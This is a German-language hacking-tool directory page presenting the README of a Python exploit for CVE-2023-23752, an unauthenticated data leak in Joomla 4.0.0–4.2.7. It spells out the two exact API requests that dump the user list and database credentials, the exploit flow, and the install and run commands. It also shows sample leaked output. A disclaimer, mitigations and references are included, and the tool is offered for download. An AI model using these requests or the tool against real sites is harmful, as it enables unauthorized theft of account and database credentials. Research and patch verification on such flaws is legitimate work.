Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-23752 — Python-Port des CVE-2023-23752-Exploits — Joomla! < 4.2.8 nicht authentifizierte Informationsoffenlegung (Benutzerliste + DB-Anmeldeinformationsleck) | Kitploit
Tools/GitHubGitHub/bardlaudian/cve-2023-23752
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

Python-Port des CVE-2023-23752-Exploits — Joomla! < 4.2.8 nicht authentifizierte Informationsoffenlegung (Benutzerliste + DB-Anmeldeinformationsleck)

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-23752 — Joomla! < 4.2.8 Nicht authentifizierte Informationsoffenlegung

Python CVE Platform

⚠️ Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Unberechtigte Nutzung ist illegal.


Inhaltsverzeichnis

  • Überblick
  • Schwachstellendetails
  • Funktionsweise
  • Anforderungen
  • Installation
  • Verwendung
  • Beispiele
  • Abhilfemaßnahmen
  • Danksagungen
  • Referenzen

Überblick

Joomla! ist eines der am weitesten verbreiteten Open-Source-Content-Management-Systeme (CMS). Die Versionen legen zwei API-Endpunkte ohne ordnungsgemäße Zugriffskontrolle frei, sodass ein Angreifer vertrauliche Informationen abrufen kann: registrierte Benutzerkonten und in anfälligen Konfigurationen die Datenbank-Zugangsdaten der Website.

4.0.0 bis 4.2.7
nicht authentifizierter

Die Schwachstelle wurde von Zewei Zhang vom NSFOCUS TIANJI Lab entdeckt und dem Joomla!-Projekt gemeldet, das in Version 4.2.8 einen Patch veröffentlichte. Ihr wurde die CVE-2023-23752 zugewiesen.

Dieses Repository enthält einen Python-Port des ursprünglichen Ruby-Exploits von ACCEIS.


Schwachstellendetails

FeldWert
CVECVE-2023-23752
BetroffenJoomla! 4.0.0 – 4.2.7
TypUnzulässige Zugriffskontrolle / Informationsoffenlegung
BerechtigungenKeine (nicht authentifiziert)
AuswirkungOffenlegung von Benutzerkonten und DB-Zugangsdaten
PatchJoomla! 4.2.8 (veröffentlicht 2023)

Funktionsweise

Die REST-API-Webservice-Endpunkte von Joomla sollten Authentifizierung und Zugriffsprüfungen erzwingen, bevor Daten zurückgegeben werden. In betroffenen Versionen führen zwei Endpunkte diese Prüfung nicht korrekt durch, wenn sie mit dem Abfrageparameter public=true aufgerufen werden. Sie behandeln die Anfrage so, als käme sie von einer anonymen "öffentlichen" Zugriffsebene, die nur nicht sensible Daten preisgeben sollte – geben aber stattdessen interne Informationen preis.

Die anfälligen Endpunkte

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • Der users-Endpunkt gibt die vollständige Liste der registrierten Konten zurück: ID, Anzeigename, Benutzername, E-Mail und Gruppenmitgliedschaft.
  • Der config-Endpunkt gibt die Anwendungskonfiguration zurück, einschließlich – wenn der Installer nicht entfernt/gehärtet wurde – des Datenbank-Hosts, Benutzernamens, Passworts, Datenbanknamens, Präfixes und der Verschlüsselungseinstellungen.

Exploit-Ablauf

Das Skript automatisiert die folgenden Schritte:

root@kitploit:~
1. Senden einer GET-Anfrage an /api/index.php/v1/users?public=true
2. Parsen der JSON:API-Antwort und Extrahieren der Benutzereinträge
3. Senden einer GET-Anfrage an /api/index.php/v1/config/application?public=true
4. Parsen der JSON:API-Antwort und Extrahieren der Seiten- und Datenbankkonfiguration
5. Ausgabe beider Datensätze auf der Konsole

Zu keinem Zeitpunkt ist eine Authentifizierung, Sitzung oder ein CSRF-Token erforderlich – der gesamte Angriff besteht aus zwei nicht authentifizierten GET-Anfragen.


Anforderungen

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

Installation

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

Verwendung

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         Basis-URL des Ziels, z.B. http://dev.devvortex.htb

options:
  -h, --help  show this help message and exit

Beispiele

Grundlegende Verwendung

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

Gegen ein HTB-ähnliches Ziel

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

Beispielausgabe

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

Abhilfemaßnahmen

  • Aktualisieren Sie Joomla! auf Version 4.2.8 oder neuer – dies ist die einzige vollständige Behebung.
  • Beschränken Sie den Zugriff auf /api/index.php/* auf Webserver- oder WAF-Ebene, wenn ein Upgrade nicht sofort möglich ist.
  • Erneuern Sie die Zugangsdaten für alle Konten oder Datenbankbenutzer, die möglicherweise über diesen Endpunkt vor dem Patchen offengelegt wurden.
  • Überwachen Sie Zugriffsprotokolle auf nicht authentifizierte Anfragen an die Webservice-Pfade /api/index.php/v1/.

Danksagungen

  • Schwachstelle entdeckt von: Zewei Zhang, NSFOCUS TIANJI Lab
  • Ursprünglicher Exploit (Ruby): noraj (Alexandre ZANNI) für ACCEIS — ursprüngliches Repository
  • Python-Port: Bardlaudian

Referenzen

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • PacketStorm Advisory
  • Joomla! Sicherheitshinweis
  • Entdeckerhinweis – NSFOCUS
  • Ursprünglicher Ruby Exploit – Acceis
Tool herunterladen